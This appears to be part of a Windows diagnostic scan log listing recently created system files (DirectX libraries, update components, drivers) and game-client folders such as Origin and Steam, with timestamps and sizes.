2016-06-23 21:20 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2016-06-23 21:20 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2016-06-23 21:20 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2016-06-23 21:20 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2016-06-23 21:20 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2016-06-23 21:20 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2016-06-23 21:20 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2016-06-23 21:20 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2016-06-23 21:20 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2016-06-23 21:20 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2016-06-23 21:20 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2016-06-23 21:20 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2016-06-23 21:20 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2016-06-23 21:20 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2016-06-23 21:20 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2016-06-23 20:12 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Origin
2016-06-23 20:12 - 2016-06-23 20:13 - 00000000 ____D C:\Program Files (x86)\Origin Games
2016-06-23 20:11 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Local\Origin
2016-06-23 19:54 - 2016-07-04 16:30 - 00000000 ____D C:\ProgramData\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000991 _____ C:\Users\Public\Desktop\Origin.lnk
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Electronic Arts
2016-06-23 19:53 - 2016-07-02 15:44 - 00000000 ____D C:\ProgramData\Package Cache
2016-06-23 19:52 - 2016-06-23 20:11 - 00000000 ____D C:\Program Files (x86)\Origin
2016-06-23 19:51 - 2016-06-23 19:52 - 31395368 _____ (Electronic Arts, Inc.) C:\Users\User not found\Downloads\OriginThinSetup.exe
2016-06-23 19:34 - 2016-07-15 22:20 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-06-23 19:34 - 2016-07-12 19:20 - 00003718 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-06-21 17:20 - 2016-07-13 15:43 - 00000000 ____D C:\Users\User not found\Documents\Sony Vegas - Voice Record
2016-06-21 17:06 - 2016-07-02 21:13 - 00000132 _____ C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-06-21 16:55 - 2016-06-21 16:55 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Adobe
2016-06-21 16:33 - 2016-06-21 16:34 - 362168352 _____ C:\Users\User not found\Downloads\Rocket League®_20160621003625.mp4
2016-06-21 16:12 - 2016-06-21 16:12 - 00000000 ____D C:\Users\User not found\AppData\Local\GWX
2016-06-20 19:00 - 2016-06-27 21:57 - 00000122 _____ C:\Users\User not found\Desktop\Musicas.txt
2016-06-20 16:11 - 2016-06-20 16:11 - 00000219 _____ C:\Users\User not found\Desktop\Counter-Strike Global Offensive.url
2016-06-20 16:11 - 2016-06-20 16:11 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-06-20 14:45 - 2016-06-20 14:45 - 01826504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsHelper.dll
2016-06-20 14:45 - 2016-06-20 14:45 - 00226472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSPerf140.dll
2016-06-20 14:22 - 2016-06-20 14:30 - 00000000 ___SD C:\Windows\system32\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ____D C:\Windows\system32\appraiser
2016-06-20 13:51 - 2016-06-20 13:51 - 00279720 _____ (Microsoft Corporation) C:\Windows\system32\VSPerf140.dll
2016-06-20 13:34 - 2016-06-20 13:34 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_iBtFltCoex_01009.Wdf
2016-06-20 13:31 - 2016-06-20 13:31 - 00000000 ____D C:\iBTWU
2016-06-20 13:24 - 2015-01-06 04:01 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2016-06-20 13:24 - 2015-01-06 03:59 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
2016-06-20 13:24 - 2015-01-06 02:12 - 00185856 _____ (Microsoft Corporation) C:\Windows\system32\rascfg.dll
2016-06-20 13:24 - 2015-01-06 02:02 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rascfg.dll
2016-06-20 13:19 - 2015-12-30 22:53 - 02017624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-06-20 13:19 - 2015-09-29 13:24 - 00155480 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2016-06-20 13:19 - 2015-04-30 00:22 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-06-20 13:19 - 2015-03-09 03:02 - 00057856 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthhfenum.sys
2016-06-20 13:19 - 2015-01-27 04:44 - 00933888 _____ (Microsoft Corporation) C:\Windows\system32\calc.exe
2016-06-20 13:19 - 2015-01-24 02:51 - 00816128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\calc.exe
2016-06-20 13:18 - 2016-02-02 19:16 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-06-20 13:18 - 2016-01-09 02:38 - 00091992 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-06-20 13:18 - 2015-12-16 18:11 - 01200128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
2016-06-20 13:18 - 2015-12-16 17:51 - 00868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:21 - 00323072 _____ (Microsoft Corporation) C:\Windows\system32\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 16:58 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\SysWOW64\locale.nls
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\system32\locale.nls
2016-06-20 13:18 - 2015-05-07 17:47 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-06-20 13:18 - 2015-05-07 16:21 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-05-07 16:05 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-04-10 01:34 - 02256896 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-06-20 13:18 - 2015-04-10 01:11 - 01943040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-06-20 13:18 - 2015-03-11 02:49 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-06-20 13:18 - 2015-03-11 02:09 - 00021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-06-20 13:18 - 2014-12-19 09:57 - 00788680 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-06-20 13:18 - 2014-12-19 09:25 - 00602776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-06-20 13:17 - 2016-01-24 19:19 - 00419160 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2016-06-20 13:17 - 2016-01-24 19:19 - 00331608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2016-06-20 13:17 - 2016-01-24 12:57 - 01335296 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2016-06-20 13:17 - 2016-01-24 12:45 - 01063424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2016-06-20 13:17 - 2015-09-04 20:24 - 00154112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2016-06-20 13:17 - 2015-08-06 17:47 - 04710400 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-06-20 13:17 - 2015-08-06 17:18 - 04068352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-06-20 13:16 - 2016-01-21 20:35 - 00952928 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-06-20 13:16 - 2016-01-21 19:42 - 00786152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-06-20 13:15 - 2016-06-03 18:11 - 00472576 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-06-20 13:15 - 2016-06-03 14:38 - 01413120 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-06-20 13:15 - 2016-06-02 18:51 - 00050352 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-06-20 13:15 - 2016-05-29 16:04 - 01204224 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00569856 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-06-20 13:15 - 2016-03-28 14:21 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-06-20 13:15 - 2016-02-05 15:46 - 01455104 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2016-06-20 13:15 - 2015-09-03 03:18 - 02531400 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-06-20 13:15 - 2015-09-03 03:17 - 01903848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-06-20 13:15 - 2015-08-28 23:20 - 00183368 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-06-20 13:15 - 2015-07-22 15:19 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-06-20 13:15 - 2015-07-22 14:52 - 01633792 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-06-20 13:15 - 2015-07-17 15:15 - 00951296 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2016-06-20 13:15 - 2015-07-17 15:10 - 00749568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2016-06-20 13:15 - 2015-03-20 02:56 - 00080384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ahcache.sys
2016-06-20 13:15 - 2015-01-29 02:58 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll
2016-06-20 13:15 - 2015-01-29 02:29 - 00290816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\photowiz.dll
2016-06-20 13:14 - 2015-03-04 02:32 - 00172544 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-04 02:12 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-02 02:43 - 00222208 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2016-06-20 13:14 - 2015-03-02 02:21 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastapi.dll
2016-06-20 13:13 - 2016-06-20 13:13 - 00000000 ____D C:\Users\User not found\AppData\Roaming\MPC-HC
2016-06-20 13:13 - 2016-02-03 16:14 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
2016-06-20 13:13 - 2016-02-02 18:51 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:19 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:01 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:51 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:48 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-06-20 13:13 - 2016-02-02 17:46 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:41 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:39 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00218448 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00192120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-06-20 13:13 - 2015-04-01 23:22 - 02985984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 23:20 - 04417536 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 04:45 - 01491456 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2016-06-20 13:13 - 2015-04-01 03:31 - 01207296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2016-06-20 13:12 - 2016-04-12 16:46 - 14467584 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-06-20 13:12 - 2016-04-12 16:30 - 12879872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-06-20 13:12 - 2016-04-10 06:35 - 00551256 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2016-06-20 13:12 - 2016-04-09 23:15 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 23:14 - 00306176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 23:10 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2016-06-20 13:12 - 2016-04-09 23:09 - 00754176 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 23:02 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\LocationApi.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00218112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 22:56 - 00543232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 22:55 - 00881152 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-06-20 13:12 - 2016-04-09 22:52 - 00281088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LocationApi.dll
2016-06-20 13:12 - 2016-04-07 17:34 - 00987136 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-06-20 13:12 - 2016-04-07 17:06 - 00927744 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2016-06-20 13:12 - 2016-04-07 16:36 - 00800768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-06-20 13:12 - 2016-04-06 22:21 - 00114528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00559104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2016-06-20 13:12 - 2016-04-06 19:17 - 18825216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-06 17:25 - 15158272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-05 23:37 - 00205824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiswan.sys
2016-06-20 13:12 - 2016-04-02 15:09 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfg.exe
2016-06-20 13:12 - 2016-04-02 14:58 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfgLib.dll
2016-06-20 13:12 - 2016-04-01 18:40 - 00322048 _____ (Microsoft Corporation) C:\Windows\system32\fvecpl.dll
